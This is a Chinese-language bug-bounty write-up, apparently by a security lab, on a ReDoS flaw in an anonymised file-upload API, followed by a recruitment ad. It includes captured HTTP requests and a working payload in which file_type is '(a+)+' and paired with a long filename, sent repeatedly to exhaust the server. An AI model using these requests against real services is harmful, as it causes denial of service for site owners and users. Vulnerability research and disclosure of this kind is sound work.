科技
SRC漏洞挖掘之ReDoS漏洞
CVES实验室
“CVES实验室”(www.cves.io)由团队旗下SRC组与渗透组合并而成,专注于漏洞挖掘、渗透测试与情报分析等方向。近年来我们报送漏洞总数已达八万余个,其中包含多个部级单位、多个通信运营商、Apache、Nginx、Thinkphp等,获得CNVD证书、CVE编号数百个,在不同规模的攻防演练活动中获奖无数,协助有关部门破获多起省督级别的案件。
ReDos漏洞
登录:
文件处功能点大概是这样:
点击上传本地文件,抓包:
POST /api/resource/add HTTP/2Host: www.xxx.comCookie: xxxxxxContent-Length: 202Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"Content-Type: application/json;charset=UTF-8Sec-Ch-Ua-Mobile: ?0Ssox-Ticket: testUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Referer: https://www.xxx.com/
{"origin":"click","batch":1685495706167,"url":"xxxx.png","name":"test.png ","size":2244,"file_type":"png","team_id":""}然后传完文件后会把传过的文件进行列出,数据包:
POST /api/resource/list_with_paging HTTP/2Host: www.xxx.comCookie: xxxxxxContent-Length: 111Content-Type: application/json;charset=UTF-8Sec-Ch-Ua-Mobile: ?0Ssox-Ticket: testUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
{"page_num":1,"page_size":2,"sort_field":"updated_at","sort_order":"desc","file_type":{},"self_uploaded":false}修改page_size为1就能查看最近上传的文件。
上面那个报错是因为bp插件的sql语句插到了file_type中,看报错信息是正则错误,而且可能与*与/有关,然后就想有什么攻击手段,搜到redos,然后就开始测试正则可以控制不。
最后发现在最后加上:**,尝试列出文件,成功报错。
发现现在是这样拼接的正则。
/.(filetype)$/然后就是fuzz出dos的payload。
{"origin":"click","batch":**********,"url":"xxxxx.txt","name":"test.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaax","size":2244,"file_type":"(a+)+","team_id":""}然后列出文件,bp发包50次。
{"page_num":"1","page_size":1,"sort_field":"updated_at","sort_order":"desc","file_type":{},"self_uploaded":true}成功拒绝服务。
招新事宜
基本要求:
1. 年满18周岁。
2. 踏实肯学,执行力强。
3. 熟悉漏洞复现(1day)思路、熟悉红队作战流程、具备单兵作战能力。
加分项:(满足任意1条即可)
1. 挖过补天专属项目高危漏洞。
2. 知名企业SRC月榜top5。
3. 有高质量CVE编号。
4. Java,Go,Rust,Node.js,PHP等熟悉任意两种及以上代码审计。
联系方式:blcx@t00ls.net